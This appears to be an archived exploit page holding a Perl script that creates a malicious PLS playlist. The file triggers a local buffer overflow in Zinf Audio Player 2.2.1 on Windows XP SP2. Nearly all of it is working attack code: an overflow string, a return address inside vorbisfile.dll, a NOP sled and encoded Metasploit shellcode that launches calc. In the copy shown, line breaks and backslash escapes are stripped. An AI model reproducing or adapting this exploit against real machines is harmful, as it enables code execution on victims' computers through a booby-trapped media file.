Home / os / win10

zinfap221univ-overflow.txt

Posted on 28 January 2009

#!/usr/bin/perl -w # Author : Houssamix # Zinf Audio Player 2.2.1 (PLS File) Universal Local Buffer Overflow exploit # tested in windows pro Sp 2 (french) print "===================================================================== "; print "Author : Houssamix "; print "===================================================================== "; print "Zinf Audio Player 2.2.1 Universal Local Buffer Overflow exploit "; print "===================================================================== "; my $overflow = "x41" x 1300; my $ret = "xC8x2Cx00x10"; #0x10002CC8 push esp - ret > universal adress(vorbisfile.dll) my $nop = "x90" x 128 ; # win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com my $shellcode = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49". "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36". "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34". "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41". "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44". "x42x30x42x50x42x30x4bx58x45x34x4ex43x4bx48x4ex37". "x45x30x4ax57x41x30x4fx4ex4bx38x4fx44x4ax41x4bx58". "x4fx55x42x42x41x50x4bx4ex49x34x4bx58x46x53x4bx38". "x41x30x50x4ex41x53x42x4cx49x49x4ex4ax46x58x42x4c". "x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e". "x46x4fx4bx33x46x35x46x52x46x30x45x37x45x4ex4bx58". "x4fx35x46x32x41x50x4bx4ex48x36x4bx48x4ex50x4bx54". "x4bx38x4fx45x4ex31x41x50x4bx4ex4bx48x4ex51x4bx38". "x41x50x4bx4ex49x48x4ex55x46x32x46x50x43x4cx41x43". "x42x4cx46x56x4bx48x42x34x42x53x45x58x42x4cx4ax57". "x4ex30x4bx48x42x44x4ex30x4bx58x42x57x4ex51x4dx4a". "x4bx38x4ax46x4ax50x4bx4ex49x50x4bx58x42x58x42x4b". "x42x30x42x30x42x30x4bx58x4ax46x4ex43x4fx45x41x43". "x48x4fx42x46x48x35x49x58x4ax4fx43x38x42x4cx4bx47". "x42x35x4ax36x42x4fx4cx58x46x50x4fx35x4ax36x4ax39". "x50x4fx4cx38x50x50x47x35x4fx4fx47x4ex43x36x41x36". "x4ex56x43x36x42x50x5a"; my $file="hsmx.pls"; $exploit = $overflow.$ret.$nop.$shellcode; open(my $FILE, ">>$file") or die "Cannot open $file: $!"; print $FILE $exploit ; close($FILE); print "$file has been created ";

 

TOP